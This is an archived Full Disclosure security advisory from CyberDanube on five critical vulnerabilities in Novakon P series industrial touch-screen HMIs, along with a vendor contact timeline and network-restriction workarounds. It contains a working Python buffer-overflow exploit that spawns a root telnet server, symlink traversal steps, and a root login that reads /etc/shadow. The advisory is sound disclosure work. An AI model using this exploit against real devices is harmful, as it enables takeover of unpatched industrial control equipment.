
Full Disclosure mailing list archives
CyberDanube Security Research 20250919-0 | Multiple Vulnerabilities in Novakon P series
From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 23 Sep 2025 12:36:43 +0000
CyberDanube Security Research 20250919-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities in Novakon HMI Series product| Novakon Touch Screen HMI P Series vulnerable version| P - V2001.A.c518o2 fixed version| - CVE number| CVE-2025-9962, CVE-2025-9963, CVE-2025-9964, | CVE-2025-9965, CVE-2025-9966 impact| Critical homepage| https://www.novakon.com.tw/ found| 21.05.2025 by| S. Dietz (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com | This work received funding from the Austrian Research | Promotion Agency (FFG) in course of the KIRAS project | TestCat (FO999911248) and was supported by AIT Austrian | Institute of Technology. ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- Founded in 2010, Novakon Co., Ltd., a subsidiary of the domestically listed industrial PC manufacturer – iBASE Technology (TPEx: 8050), is a dedicated Panel PC, HMI (Human-Machine Interface) and IIoT (Industrial Internet of Things) software developer and hardware manufacturer. Our exceptional customized services provide clients with a wide array of software tailormade solutions. As testament to the true value of MIT R&D and manufacture, not only do we offer customized software and hardware ODM services, but we are also committed to providing the best product functions and services for different industrial applications. Novakon focuses on long-term R&D investment to reduce the cost of introducing automation measures in addition to meeting the needs of various vertical applications. Source: https://www.novakon.com.tw/en/about Vulnerable versions ------------------------------------------------------------------------------- P - V2001.A.c518o2 Vulnerability overview ------------------------------------------------------------------------------- 1) Unauthenticated Buffer Overflow (CVE-2025-9962) A buffer overflow vulnerability exists in the binary PSeriesbiosinterface, which allows unauthenticated attacker to gain remote code execution as root over the network. 2) Directory Traversal via Symlink (CVE-2025-9963) A directory traversal vulnerability was identified in the file-explorer functionality of the device. An attacker can use this vulnerability to read and write system-wide files and configurations as user "root". 3) Root User Weak Authentication (CVE-2025-9964) The root user does not have a configured password. Allowing attacker to login with access to a console to login with an empty string. 4) UDP Service Weak Authentication (CVE-2025-9965) The service listening on 60681/UDP is responsible for copying applications to the device. As the service does not require authentication, an attacker can upload and download any application from and to the device. 5) Execution with Unnecessary Privileges (CVE-2025-9966) The processes running on the device run mostly with elevated privileges, which increases the attack surface of the device. 6) Missing Protection Mechanisms Multiple binaries on the device are missing basic protection mechanisms like stack canaries, pie, and RELRO. Proof of Concept ------------------------------------------------------------------------------- 1) Unauthenticated Buffer Overflow (CVE-2025-9962) The service running on 60681/UDP (Pseriesbiosinterface) is vulnerable to a stack based buffer overflow vulnerability. An unauthenticated attacker can exploit this issue to gain remote code execution as root. The following python PoC can be used to start a telnet server on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/bin/env python3 # fitfrost4 <S.Dietz> from pwn import * p = remote(args.IP, 60681, typ='udp') r6_pos = 112 pc_pos = 136 sp_pos = 576 system_call = 0x0002e728 # 0x000ef2ce (0x000ef2cf): add r0, sp, #0x1b4; bx r6; buf = flat({ r6_pos: p32(system_call), pc_pos: p32(0x000ef2cf), sp_pos: b"/usr/sbin/telnetd &\00" }) log.info(hexdump(buf)) p.send(buf) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The root cause of this issue is the usage of an unchecked size from QUdpSocket::pendingDatagramSize() in client::readDatagram(). The following decomp makes the issue more clear: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 00058868 while (true) 00058868 this->datagram 0005886c r0_4 = QUdpSocket::hasPendingDatagrams() 0005886c 00058874 if (r0_4 == 0) 00058874 break 00058874 0005883c this->datagram 00058840 uint16_t* size = QUdpSocket::pendingDatagramSize() 00058848 unimplemented {vdup.32 d16, r0} 00058854 unimplemented {vshr.s64 d16, d16, #0x20} 00058858 int16_t* var_10c_1 = &var_fa 0005885c unimplemented {vmov r2, r3, d16} 00058864 QUdpSocket::readDatagram(this->datagram, &var_f8, &var_8c, size) ------------------------------------------------------------------------------- 2) Directory Traversal via Symlink (CVE-2025-9963) An physical attacker can create an ext2 partition on a flash drive and add a symlink to / in order to abuse the file-explorer feature of the GUI to modify system-wide configuration files. 1. Create and upload an application with iFace Designer. The app should contain a button to spawn the file-explorer. 2. Format and create a symlink to "/". 3. Use the copy/paste functionality to modify the filesystem as root. ------------------------------------------------------------------------------- 3) Root User Weak Authentication (CVE-2025-9964) An attacker with access to a console can login as root with an empty password. We abused this issue by spawning a telnetd instance with 1). However, this can also be exploited by crashing the Pseriesbiosinterface in order to drop to a login prompt directly on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ am335x-evm login: root root@am335x-evm:~# cat /etc/shadow root::16622:0:99999:7::: daemon:*:16622:0:99999:7::: bin:*:16622:0:99999:7::: [...] ------------------------------------------------------------------------------- 4) UDP Service Weak Authentication (CVE-2025-9965) An attacker can upload and download applications to the device without any kind of authentication. We exploited this issue with 2) in order to gain inital foothold onto the device. 1. Install the iFACE Designer 2. Upload or download any application over the network. ------------------------------------------------------------------------------- 5) Execution with Unnecessary Privileges (CVE-2025-9966) The processes running on the device are executed mostly as root user, increasing the attack surface of the device. If an attacker can exploit any service (e.g by using 1) or 2)) the device is fully compromised. Especially the processes exposed to the user (iFACE_RT and PSeriesbiosinterface) are impacted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ root@am335x-evm:~# ps PID USER VSZ STAT COMMAND [...] 938 root 2636 S /lib/udev/udevd -d 1215 root 2632 S /lib/udev/udevd -d 1216 root 2632 S /lib/udev/udevd -d 1418 messageb 2352 S /usr/bin/dbus-daemon --system 1436 root 74984 S ./superkon/tools/PSeriesbiosinterface -qws 1441 root 1868 S /sbin/syslogd -n -O /var/log/messages 1444 root 1868 S /sbin/klogd -n 1456 root 1872 S /sbin/getty 38400 tty1 1612 root 2624 S /bin/login 1636 root 165m S {RT} iFACE_RT -qws -display LinuxFb: ------------------------------------------------------------------------------- 6) Missing Protection Mechanisms The exploited binaries are missing basic protection mechanisms like stack canries, PIE and RELRO. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ checksec --file=PSeriesbiosinterface Arch: arm-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8000) RPATH: b'/opt/qt_arm48_p/lib' Stripped: No ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution ------------------------------------------------------------------------------- None Workaround ------------------------------------------------------------------------------- Restrict network access to the device. Disable Ethernet configuration if serial ports are used for PLC communication. Recommendation ------------------------------------------------------------------------------- Restrict network access to the device. Disable Ethernet configuration if serial ports are used for PLC communication. Contact Timeline ------------------------------------------------------------------------------- 2025-06-21: Contacting Novakon for security contact 2025-05-21: Asking sales () novakon com tw for security contact 2025-05-26: Asking sales () novakon com tw and sales () novatekcontrols com for a security contact 2025-05-28: Asking Novakon Co., Ltd. via Linkedin for security contact 2025-06-10: Contacting Bressner for contact for novakon. Bressner said we should send the findings again as novakon is now informed about the issue. 2025-06-10: Sending sales () novakon com tw an email again. 2025-06-10: Contacting Vincent Shao (Sales Director of Novakon) via LinkedIn for a security contact 2025-06-11: Asking Vincent Shao for Updates regarding security contact. Tells us we should send the mail to him directly. We inform him that its critical information and shouldn't be send unencrypted 2025-06-12: Send Vincent Shao a password protected link with the information. Notice them about our responsible disclosure policy and the 67 days deadline. Vincent Shao tells us that they don not agree to any publication. 2025-06-18: Asking for update via LinkedIn. No response. 2025-08-05: Asking for update via LinkedIn. No response. 2025-08-25: Asking for update via LinkedIn. Informing Vincent about the upcoming release if we do not hear from them until the 19th september. 2025-09-19: Release of advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz / @2025 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- CyberDanube Security Research 20250919-0 | Multiple Vulnerabilities in Novakon P series Thomas Weber | CyberDanube via Fulldisclosure (Sep 25)